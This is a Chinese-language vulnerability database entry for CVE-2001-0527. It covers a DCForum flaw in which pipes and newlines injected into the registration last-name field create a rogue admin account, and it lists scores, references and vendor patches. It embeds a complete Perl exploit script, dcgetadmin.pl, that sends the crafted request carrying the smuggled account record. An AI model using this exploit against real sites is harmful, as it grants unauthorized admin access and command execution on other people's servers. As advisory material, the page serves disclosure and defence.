CVE-2001-0527
CVSS10.0
发布时间 :2001-08-14 00:00:00
修订时间 :2008-09-05 16:24:19
NMCOE    

[原文]DCScripts DCForum versions 2000 and earlier allow a remote attacker to gain additional privileges by inserting pipe symbols (|) and newlines into the last name in the registration form, which will create an extra entry in the registration database.


[CNNVD]DCForum远程可获得管理权限漏洞(CNNVD-200108-061)

        
        DCForum是一种基于WEB的会议系统,设计用于在线讨论。它是用Perl实现的,几乎没有系统相关性,可以运行于Linux、Windows以及绝大多数Unix变体上。
        一些版本的DCForum存在漏洞,远程攻击者可以利用这个漏洞获得DCForum的管理权限甚至执行任意命令。
        DCForum维护着一个文件包含用户账号信息,包含用户口令的哈希值和其它敏感信息。当建立一个新账号的适合,用户信息会被写入这个文件,一个用户信息一行,每一项记录用管道符('|')隔开。DCForum对用户输入的信息检查不严,攻击者可以在用户信息最后一项的最后输入URL编码的管道符和换行符就可以在后面再任意添加用户到用户信息文件,攻击者可以指定管理权限。
        DCForum有管理权限的账号可能以Web服务器的权限执行任意命令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:dcscripts:dcforum_2000:1.0
cpe:/a:dcscripts:dcforum:6.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0527
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0527
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200108-061
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/6538.php
(VENDOR_ADVISORY)  XF  dcforum-cgi-admin-access(6538)
http://www.dcscripts.com/dcforum/dcfNews/167.html
(PATCH)  CONFIRM  http://www.dcscripts.com/dcforum/dcfNews/167.html
http://archives.neohapsis.com/archives/bugtraq/2001-05/0122.html
(VENDOR_ADVISORY)  BUGTRAQ  20010515 DCForum Password File Manipukation Vulnerability (qDefense Advisory Number QDAV-5-2000-2)
http://www.securityfocus.com/bid/2728
(UNKNOWN)  BID  2728
http://www.osvdb.org/480
(UNKNOWN)  OSVDB  480

- 漏洞信息

DCForum远程可获得管理权限漏洞
危急 输入验证
2001-08-14 00:00:00 2005-05-02 00:00:00
远程  
        
        DCForum是一种基于WEB的会议系统,设计用于在线讨论。它是用Perl实现的,几乎没有系统相关性,可以运行于Linux、Windows以及绝大多数Unix变体上。
        一些版本的DCForum存在漏洞,远程攻击者可以利用这个漏洞获得DCForum的管理权限甚至执行任意命令。
        DCForum维护着一个文件包含用户账号信息,包含用户口令的哈希值和其它敏感信息。当建立一个新账号的适合,用户信息会被写入这个文件,一个用户信息一行,每一项记录用管道符('|')隔开。DCForum对用户输入的信息检查不严,攻击者可以在用户信息最后一项的最后输入URL编码的管道符和换行符就可以在后面再任意添加用户到用户信息文件,攻击者可以指定管理权限。
        DCForum有管理权限的账号可能以Web服务器的权限执行任意命令。
        

- 公告与补丁

        厂商补丁:
        DC Scripts
        ----------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        DC Scripts DCForum 2000 1.0:
        DC Scripts Patch 2000 auth_lib_2_dcf2000.zip
        
        http://www.dcscripts.com/FAQ/auth_lib_2_dcf2000.zip

        DC Scripts DCForum 6.0:
        DC Scripts Patch 6.0 auth_lib_2_dcf6.zip
        
        http://www.dcscripts.com/FAQ/auth_lib_2_dcf6.zip

- 漏洞信息 (20849)

DCForum 6.0 Remote Admin Privilege Compromise Vulnerability (EDBID:20849)
cgi remote
2001-05-08 Verified
0 Franklin DeMatto
N/A [点击下载]
source: http://www.securityfocus.com/bid/2728/info

DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums.

Versions of DCForum are vulnerable to attacks which can yield an elevation of privileges and remote execution of arbitrary commands.

DCForum maintains a file containing its user account information, including hashed user passwords and other potentially sensitive information.

When a new user account is created, the user's information is written to this file. Fields within each record are delimited by pipe ('|') and newline characters.

DCForum fails to properly validate this user-supplied account information. As a result, an attacker can cause a corruption of the script's user records by providing a value for the last name field which includes URL-encoded pipes and newlines. By appending desired values to the last name field, an attacker can insert account information for a new user, and specify admin privileges.

This newly-created admin account allows a remote attacker to issue arbitrary commands with the privilege level of the webserver process. 

#!/usr/bin/perl

# dcgetadmin.pl - (C) 2001 Franklin DeMatto - franklin@qDefense.com


use Getopt::Std;
use IO::Socket;

getopts ('ap');

usage () unless ($#ARGV == 0 || $#ARGV == 1);
if ($opt_a) { print "\n -a not implemented yet\n\n"; exit 1; }

$host = $ARGV[0];
$uri =  $ARGV[1] ? $ARGV[1] : '/cgi-bin/dcforum/dcboard.cgi';

$username = 'evilhacker' .  ( int rand(9899) + 100); 
$password = int rand  (9899) + 100;
$hash = $opt_p ? $password : crypt ($password, substr ($password, 0, 2));
$dummyuser = 'not' . ( int rand(9899) + 100) ;
$dummypass = int rand (9899) + 100;

print "\n(Debugging info: Hash = $hash    Dummyuser = $dummyuser    Dummypass =
$dummypass)\n";
print "Attempting to register username $username with password $password as admin . . .\n";

$sock = IO::Socket::INET->new("$host:80") or die "Unable to connect to $host: $!\n\n";
$req = "GET
$uri?command=register&az=user_register&Username=$dummyuser&Password=$dummypass&dup_Password=$dummypass";
$req .=
"&Firstname=Proof&Lastname=Concept%0a$hash%7c$username%7cadmin%7cProof%7cConcept&EMail=nothere%40nomail.com";
$req .= "&required=Password%2cUsername%2cFirstname%2cLastname%2cEMail HTTP/1.0\015\012";
$req .= "Host: $host\015\012\015\012";

print $sock $req;

print "The server replied:\n\n";

while (<$sock>)
{
  if (/BODY/) { $in_body = 1; }
  next unless $in_body;
  if (/form|<\/BODY>/) { last; }
  s/<.+?>//g;
  print $_ unless (/^\s*$/);
}
  print "\nNote: Even if your password is supposed to be e-mailed to you, it should work
right away.\n";


sub usage
{
  print <<EOF;
dcgetadmin.pl - (C) 2001 Franklin DeMatto - franklin\@qDefense.com

Usage: $0 [options] host [path to dcboard.cgi]

Options:
   -a to activate the account (for sites that do not activate automatically)
  NOTE: This option is not yet supported, but should be quite easy to add if you need it
  
  -p to leave the password in plaintext (necessary when the target is NT)

The path to dcboard.cgi, if not supplied, is assumed to be /cgi-bin/dcforum/dcboard.cgi

EOF
  exit 1;
}


		

- 漏洞信息

480
DCForum dcboard.cgi Arbitrary Admin Account Creation
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

DCForum contains a flaw that allows a remote attacker to create an arbitrary administrative account. Due to a flaw in the process of creating a new user, proper sanitization is not applied to input. This allows an attacker to supply a pipe (|) and arbitrary text in the form of an additional user account, which will be added to the password file.

- 时间线

2001-05-15 Unknow
2001-05-15 Unknow

- 解决方案

Upgrade to version 6.25 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站